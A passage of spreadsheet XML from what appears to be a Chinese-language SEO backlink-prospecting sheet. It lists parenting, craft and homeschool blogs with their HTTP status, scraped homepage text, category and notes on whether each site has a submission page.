        <x:v>Home Page - Seasons in Parenting</x:v>
      </x:c>
      <x:c r="J346" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K346" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L346" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M346" s="19" t="str">
        <x:v>https://seasonsinparenting.com/</x:v>
      </x:c>
      <x:c r="N346" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O346" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P346" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q346" s="21" t="str">
        <x:v>The mom behind Seasons in Parenting. Welcome! I'm so excited to have you join me on this journey of motherhood. Home Page - Seasons in Parenting Skip to content Seasons in Parenting Helping moms find the joy in motherhood Blog About Me Resources Visit Our Etsy Shop Visit Our Etsy Shop Preparing for Parenthood The Kiddos Home Life Travel Just for Momma Seasons in Parenting Helping moms find the joy in motherhood Blog About Me Resources Preparing for Parenthood The Kiddos Home Life Travel Just for Momma Printables and Planners for Moms Hi, I’m Samantha… The mom behind Seasons in Parenting. Welcome! I’m so excited to have you join me on this journey of motherhood. Here you’re going to find help on the beginning steps into parenting: pregnancy, labor and delivery, and breastfeeding. There’s also advice on</x:v>
      </x:c>
      <x:c r="R346" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S346" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T346" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://seasonsinparenting.com</x:v>
      </x:c>
    </x:row>
    <x:row r="347">
      <x:c r="A347" s="18" t="str">
        <x:v>346</x:v>
      </x:c>
      <x:c r="B347" s="19" t="str">
        <x:v>thepurpleyarn.com</x:v>
      </x:c>
      <x:c r="C347" s="19" t="str">
        <x:v>https://thepurpleyarn.com</x:v>
      </x:c>
      <x:c r="D347" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E347" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F347" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G347" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H347" s="19" t="str">
        <x:v>https://thepurpleyarn.com/</x:v>
      </x:c>
      <x:c r="I347" s="19" t="str">
        <x:v>The Purple Yarn - Raising creatives</x:v>
      </x:c>
      <x:c r="J347" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K347" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L347" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M347" s="19" t="str">
        <x:v>https://thepurpleyarn.com/</x:v>
      </x:c>
      <x:c r="N347" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O347" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P347" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q347" s="21" t="str">
        <x:v>Raising creatives The Purple Yarn - Raising creatives Skip to content Paper crafts Origami crafts Tissue paper crafts Paper cup crafts Paper plate crafts Seasonal crafts Spring crafts Summer crafts Fall crafts Winter crafts Holiday Crafts New Year crafts Valentine’s Day crafts Dr. Suess Day St.Patrick’s Day crafts Easter crafts Mother’s Day Crafts Back to school Halloween crafts Thanksgiving crafts Christmas crafts General crafts Popsicle stick crafts Shop Youtube Contact Back to school | Fall crafts | Paper crafts | Seasonal crafts Rocking Apple craft for Kids By TPY Team July 25, 2026 July 25, 2026 Apples make such a fun theme for back-to-school crafts and fall crafts, and this rocking apple brings a playfu</x:v>
      </x:c>
      <x:c r="R347" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S347" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T347" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thepurpleyarn.com</x:v>
      </x:c>
    </x:row>
    <x:row r="348">
      <x:c r="A348" s="18" t="str">
        <x:v>347</x:v>
      </x:c>
      <x:c r="B348" s="19" t="str">
        <x:v>goldarrowcamp.com</x:v>
      </x:c>
      <x:c r="C348" s="19" t="str">
        <x:v>https://goldarrowcamp.com</x:v>
      </x:c>
      <x:c r="D348" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E348" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F348" s="20"/>
      <x:c r="G348" s="19" t="str">
        <x:v>超时</x:v>
      </x:c>
      <x:c r="H348" s="19" t="str"/>
      <x:c r="I348" s="19" t="str"/>
      <x:c r="J348" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K348" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L348" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M348" s="19" t="str">
        <x:v>https://goldarrowcamp.com</x:v>
      </x:c>
      <x:c r="N348" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O348" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P348" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q348" s="21" t="str"/>
      <x:c r="R348" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S348" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T348" s="21" t="str">
        <x:v>timeout | timeout | 请求: https://goldarrowcamp.com
http://goldarrowcamp.com</x:v>
      </x:c>
    </x:row>
    <x:row r="349">
      <x:c r="A349" s="18" t="str">
        <x:v>348</x:v>
      </x:c>
      <x:c r="B349" s="19" t="str">
        <x:v>bestwithkids.com</x:v>
      </x:c>
      <x:c r="C349" s="19" t="str">
        <x:v>https://bestwithkids.com</x:v>
      </x:c>
      <x:c r="D349" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E349" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F349" s="20"/>
      <x:c r="G349" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H349" s="19" t="str"/>
      <x:c r="I349" s="19" t="str"/>
      <x:c r="J349" s="19" t="str">
        <x:v>可能相关站点</x:v>
      </x:c>
      <x:c r="K349" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L349" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M349" s="19" t="str">
        <x:v>https://bestwithkids.com</x:v>
      </x:c>
      <x:c r="N349" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O349" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P349" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q349" s="21" t="str"/>
      <x:c r="R349" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S349" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T349" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://bestwithkids.com
http://bestwithkids.com</x:v>
      </x:c>
    </x:row>
    <x:row r="350">
      <x:c r="A350" s="18" t="str">
        <x:v>349</x:v>
      </x:c>
      <x:c r="B350" s="19" t="str">
        <x:v>b-inspiredmama.com</x:v>
      </x:c>
      <x:c r="C350" s="19" t="str">
        <x:v>https://b-inspiredmama.com</x:v>
      </x:c>
      <x:c r="D350" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E350" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F350" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G350" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H350" s="19" t="str">
        <x:v>https://b-inspiredmama.com/</x:v>
      </x:c>
      <x:c r="I350" s="19" t="str">
        <x:v>B-Inspired Mama • Kids Crafts · Play &amp; Learning Activities · Fun Food · Creative Parenting Tips</x:v>
      </x:c>
      <x:c r="J350" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K350" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L350" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M350" s="19" t="str">
        <x:v>https://b-inspiredmama.com/</x:v>
      </x:c>
      <x:c r="N350" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O350" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P350" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q350" s="21" t="str">
        <x:v>B-Inspired Mama • Kids Crafts · Play &amp; Learning Activities · Fun Food · Creative Parenting Tips B-Inspired Mama • Kids Crafts · Play &amp; Learning Activities · Fun Food · Creative Parenting Tips Skip to primary navigation Skip to main content Skip to primary sidebar Skip to footer About Contact Subscribe to B-Inspired Mama Newsletters TODAY! Privacy Policy Disclosure The “Fun Finds for Kids” Shop B-Inspired Mama Kids Crafts · Play &amp; Learning Activities · Fun Food · Creative Parenting Tips Home Kids Crafts Painting Mixed Media Hand Print Art Art History Play and Learning Fine Motor Fun Play Dough Outdoor Play Literacy &amp; Reading Math Fun Science Fun Sensory Play &amp; Sensory Processing Family Recipes Breakfast Ideas Lunch Ideas Snack Ideas Dinner Ideas Dessert Beverages Creative Parenting Slee</x:v>
      </x:c>
      <x:c r="R350" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S350" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T350" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://b-inspiredmama.com</x:v>
      </x:c>
    </x:row>
    <x:row r="351">
      <x:c r="A351" s="18" t="str">
        <x:v>350</x:v>
      </x:c>
      <x:c r="B351" s="19" t="str">
        <x:v>wonderinhisworld.com</x:v>
      </x:c>
      <x:c r="C351" s="19" t="str">
        <x:v>https://wonderinhisworld.com</x:v>
      </x:c>
      <x:c r="D351" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E351" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F351" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G351" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H351" s="19" t="str">
        <x:v>https://www.wonderinhisworld.com/</x:v>
      </x:c>
      <x:c r="I351" s="19" t="str">
        <x:v>Home - Wonder in His World</x:v>
      </x:c>
      <x:c r="J351" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K351" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L351" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M351" s="19" t="str">
        <x:v>https://www.wonderinhisworld.com/</x:v>
      </x:c>
      <x:c r="N351" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O351" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P351" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q351" s="21" t="str">
        <x:v>A homeschool blog designed to inspire your children to want to learn more about God and the earth He created for us through homeschool. Home - Wonder in His World Skip to content Check out my etsy shop for activities and resources for homeschooling! Home About Contact Arts &amp; Crafts Lost Sheep Craft Resources Reasons to Join a Homeschool Co-Op Arts &amp; Crafts Popsicle Stick Noah’s Ark Arts &amp; Crafts Learning Activities Lesson Plans Resources Subscribe for Updates! Subscribe to be the first to learn about new posts Name * Email * Email Subscribe My favorites Check out some of my favorite posts and resources for homeschooling! More of my favs The Best Free Homeschool Programs 5 Easy Preschool Letter Activities Butterfly Craft Resources Make Reading Fun with Free Printable Reading Trackers for Kids Whether you’re following a struct</x:v>
      </x:c>
      <x:c r="R351" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S351" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T351" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://wonderinhisworld.com</x:v>
      </x:c>
    </x:row>
    <x:row r="352">
      <x:c r="A352" s="18" t="str">
        <x:v>351</x:v>
      </x:c>
      <x:c r="B352" s="19" t="str">
        <x:v>thriftymommastips.com</x:v>
      </x:c>
      <x:c r="C352" s="19" t="str">
        <x:v>https://thriftymommastips.com</x:v>
      </x:c>
      <x:c r="D352" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E352" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F352" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G352" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H352" s="19" t="str">
        <x:v>https://www.thriftymommastips.com/</x:v>
      </x:c>
      <x:c r="I352" s="19" t="str">
        <x:v>A Canadian Lifestyle, Travel, Health and Technology Blog</x:v>
      </x:c>
      <x:c r="J352" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K352" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L352" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M352" s="19" t="str">
        <x:v>https://www.thriftymommastips.com/</x:v>
      </x:c>
      <x:c r="N352" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O352" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P352" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q352" s="21" t="str">
        <x:v>Frank talk about adoption, special needs parenting, health, technology, adventure and family travel A Canadian Lifestyle, Travel, Health and Technology Blog Skip to content Home Contact PR/Media About Me Travel Health Parenting Technology Food Printables Giveaways Home Contact PR/Media About Me Travel Health Parenting Technology Food Printables Giveaways Search for: Thrifty Mommas Tips Travel, Health &amp; Family Comparing Numbers Task Cards What to Expect at Stonehenge Roll a Story Road Trip Game Setting the Stage for Success: Preschool Patterns and Shapes 10 Budget-Friendly Day Trips in Southern Ontario Printables Comparing Numbers Task Cards August 28, 2026 - By Paula We all probably recognize that math can be a hard task to master. But comparing numbers is a fun little subject on its own i</x:v>
      </x:c>
      <x:c r="R352" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S352" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T352" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thriftymommastips.com</x:v>
      </x:c>
    </x:row>
    <x:row r="353">
      <x:c r="A353" s="18" t="str">
        <x:v>352</x:v>
      </x:c>
      <x:c r="B353" s="19" t="str">
        <x:v>homemesh.com.tw</x:v>
      </x:c>
      <x:c r="C353" s="19" t="str">
        <x:v>https://homemesh.com.tw</x:v>
      </x:c>
      <x:c r="D353" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E353" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F353" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G353" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H353" s="19" t="str">
        <x:v>https://www.homemesh.com.tw/</x:v>
      </x:c>
      <x:c r="I353" s="19" t="str">
        <x:v>HomeMesh居家市集</x:v>
      </x:c>
      <x:c r="J353" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K353" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L353" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M353" s="19" t="str">
        <x:v>https://www.homemesh.com.tw/</x:v>
      </x:c>
      <x:c r="N353" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O353" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P353" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q353" s="21" t="str">
        <x:v>Homemesh居家市集是一個以「建築建材工程、裝修修繕、家具家飾、專業設計」為核心，所打造的網路平台，著重於提供居家生活產業所需資訊、電子商務以及社群經營服務。希望同時滿足建築師、設計師、修繕廠商、材料行等各種不同族群的需求，建構居家相關，包含家具、家飾、材料、建材、消防、燈具、修繕、裝修、工程、設計等類型的商品資料庫及時下大眾最關心的生活布置、PM2.5、健康、室內設計、裝潢、裝修等類別之實用文庫，成為全台灣資訊量最大、商品最齊全、知識最完整的線上居家建築整合網站。 HomeMesh居家市集 建築建材工程 建築工程 雜項地工 土建結構 水電工程 門窗外牆 玻璃工程 油漆塗裝 防水隔熱 景觀休閒 環保衛生 泥作木作 拆除吊掛 建材設備 一般建材 隔間天花 木材製品 地坪材料 金屬建材 五金門鎖 磚瓦石材 水泥製品 化工建材 水電材料 施工機具 機電設備 家電照明 安控資訊 消防安全 綠色建材 節能工程 衛浴建材 廚具建材 智慧城市 防火建材 開發設計 建設開發 營建承包 政府機關 周邊服務 設備租賃 技師檢測 模型招牌 廣告行銷 曬圖印刷 法律財稅 工商服務 清潔運輸 同業公會 教育訓練 其他 專業設計 室內設計 現代風格 古典風格 鄉村風格 混搭風格 日式風格 地中海風格 南洋休閒風 北歐簡約風 美式風格 東方禪風 卡通風格 Loft風格 室內設計 建築設計 建築設計 景觀設計 景觀設計 商空設計 商業空間 家具家飾 家具 桌 椅 櫃 沙發 屏風 床 系統家具 辦公相關 進口家具 其他家具 訂製家具 家飾 布飾 地毯 窗簾 寢飾 燈飾 掛飾 容器 鏡子 時鐘 手作小物 家飾佈置 修繕裝修 改修工程 舊屋翻新 防水抓漏 水電改修 冷氣空調 隔間改修 油漆壁紙 木作改修 地板改修 系統櫃工程 衛浴改修 廚房改修 門窗改修 照明改修 泥作改修 知識庫 知識分區 築特輯 每月專欄 專家訪談 設計師專欄 廠商推薦 系列文章 建材情報 BIM知識資源平台 MENU 編碼系統 元件分類 廠商列表 數據分析 知識影片 課程資訊 建築名師 加入我們 BIM知識資源平台 分類 編碼系統 元件分類 廠商列表 數據分析 知識影片 課程資訊 建築名師 加入我們 建築</x:v>
      </x:c>
      <x:c r="R353" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S353" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T353" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://homemesh.com.tw</x:v>
      </x:c>
    </x:row>
    <x:row r="354">
      <x:c r="A354" s="18" t="str">
        <x:v>353</x:v>
      </x:c>
      <x:c r="B354" s="19" t="str">
        <x:v>msn.com</x:v>
      </x:c>
      <x:c r="C354" s="19" t="str">
        <x:v>https://msn.com</x:v>
      </x:c>
      <x:c r="D354" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E354" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F354" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G354" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H354" s="19" t="str">
        <x:v>https://www.msn.com/ja-jp</x:v>
      </x:c>
      <x:c r="I354" s="19" t="str">
        <x:v>MSN</x:v>
      </x:c>
      <x:c r="J354" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K354" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L354" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M354" s="19" t="str">
        <x:v>https://www.msn.com/ja-jp</x:v>
      </x:c>
      <x:c r="N354" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O354" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P354" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q354" s="21" t="str">
        <x:v>MSN</x:v>
      </x:c>
      <x:c r="R354" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S354" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T354" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://msn.com</x:v>
      </x:c>
    </x:row>
    <x:row r="355">
      <x:c r="A355" s="18" t="str">
        <x:v>354</x:v>
      </x:c>
      <x:c r="B355" s="19" t="str">
        <x:v>comebackmomma.com</x:v>
      </x:c>
      <x:c r="C355" s="19" t="str">
        <x:v>https://comebackmomma.com</x:v>
      </x:c>
      <x:c r="D355" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E355" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F355" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G355" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H355" s="19" t="str">
        <x:v>https://comebackmomma.com/</x:v>
      </x:c>
      <x:c r="I355" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J355" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K355" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L355" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M355" s="19" t="str">
        <x:v>https://comebackmomma.com/</x:v>
      </x:c>
      <x:c r="N355" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O355" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P355" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q355" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access comebackmomma.com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a349b9e62d63b003 &amp;bull; Your IP: Cli</x:v>
      </x:c>
      <x:c r="R355" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S355" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T355" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://comebackmomma.com</x:v>
      </x:c>
    </x:row>
    <x:row r="356">
      <x:c r="A356" s="18" t="str">
        <x:v>355</x:v>
      </x:c>
      <x:c r="B356" s="19" t="str">
        <x:v>pollywogsplace.com</x:v>
      </x:c>
      <x:c r="C356" s="19" t="str">
        <x:v>https://pollywogsplace.com</x:v>
      </x:c>
      <x:c r="D356" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E356" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F356" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G356" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H356" s="19" t="str">
        <x:v>https://pollywogsplace.com/</x:v>
      </x:c>
      <x:c r="I356" s="19" t="str">
        <x:v>Pollywog's Place Blog – Where LIFE is ALWAYS a little bit CRAZY, a little bit LOUD, but filled with LOVE and a whole LOT of JESUS!</x:v>
      </x:c>
      <x:c r="J356" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K356" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L356" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M356" s="19" t="str">
        <x:v>https://pollywogsplace.com/</x:v>
      </x:c>
      <x:c r="N356" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O356" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P356" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q356" s="21" t="str">
        <x:v>Where LIFE is ALWAYS a little bit CRAZY, a little bit LOUD, but filled with LOVE and a whole LOT of JESUS! Pollywog's Place Blog – Where LIFE is ALWAYS a little bit CRAZY, a little bit LOUD, but filled with LOVE and a whole LOT of JESUS! Skip to content Pollywog's Place Blog Menu Home Sabbath &amp; Biblical Feasts Sabbath Resources Printable Bible Studies and Devotionals Biblical Feasts: Spring Feast Resources Biblical Feasts: Fall Feast Resources Mama’s Recipe Box Crazy Delicious Low-Carb Substitutions You Can Make Today! Holiday Recipes Special Holiday Meals Appetizers Beverages Breads Breakfasts Butters, Jams, &amp; Jellies Plus Misc. Canning Recipes Cakes Icings Candies Cookies Crockpot Meals Gluten Free/Grain Free Recipes Gravies, Mixes, Sauces, and Such Main Dishes Pies, Puddings, and Desserts Quic</x:v>
      </x:c>
      <x:c r="R356" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S356" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T356" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://pollywogsplace.com</x:v>
      </x:c>
    </x:row>
    <x:row r="357">
      <x:c r="A357" s="18" t="str">
        <x:v>356</x:v>
      </x:c>
      <x:c r="B357" s="19" t="str">
        <x:v>aboutamom.com</x:v>
      </x:c>
      <x:c r="C357" s="19" t="str">
        <x:v>https://aboutamom.com</x:v>
      </x:c>
      <x:c r="D357" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E357" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F357" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G357" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H357" s="19" t="str">
        <x:v>https://www.aboutamom.com/</x:v>
      </x:c>
      <x:c r="I357" s="19" t="str">
        <x:v>About a Mom — Inspiration for Motherhood</x:v>
      </x:c>
      <x:c r="J357" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K357" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L357" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M357" s="19" t="str">
        <x:v>https://www.aboutamom.com/</x:v>
      </x:c>
      <x:c r="N357" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O357" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P357" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q357" s="21" t="str">
        <x:v>A Georgia family lifestyle blog. About a Mom — Inspiration for Motherhood Skip to primary navigation Skip to main content Main Menu About a Mom Inspiration for Motherhood Display Search Bar search... Dinner Ideas Main Course Pasta Chicken Casseroles Vegetarian Slow Cooker Recipes Keto Appetizers &amp; Sides Salads &amp; Side Dishes Appetizers Bread Sweet Treats Dessert Baking Cookies Kids Corner Crafts for Kids Kids Fun Activities Learning Activities Food for Kids Mealtime Printables Crafts parenting About Spinach And Ricotta Stuffed Shells let's bake! family fun ideas main courses casseroles side dishes treats &amp; desserts Cookout Classic Salmon Burgers Move over beef; there’s a new kid in town, thanks to this recipe for salmon burg</x:v>
      </x:c>
      <x:c r="R357" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S357" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T357" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://aboutamom.com</x:v>
      </x:c>
    </x:row>
    <x:row r="358">
      <x:c r="A358" s="18" t="str">
        <x:v>357</x:v>
      </x:c>
      <x:c r="B358" s="19" t="str">
        <x:v>thetravelingaviators.com</x:v>
      </x:c>
      <x:c r="C358" s="19" t="str">
        <x:v>https://thetravelingaviators.com</x:v>
      </x:c>
      <x:c r="D358" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E358" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F358" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G358" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H358" s="19" t="str">
        <x:v>https://www.thetravelingaviators.com/</x:v>
      </x:c>
      <x:c r="I358" s="19" t="str">
        <x:v>THE TRAVELING AVIATORS | Toddler &amp; Mom Resources</x:v>
      </x:c>
      <x:c r="J358" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K358" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L358" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M358" s="19" t="str">
        <x:v>https://www.thetravelingaviators.com/</x:v>
      </x:c>
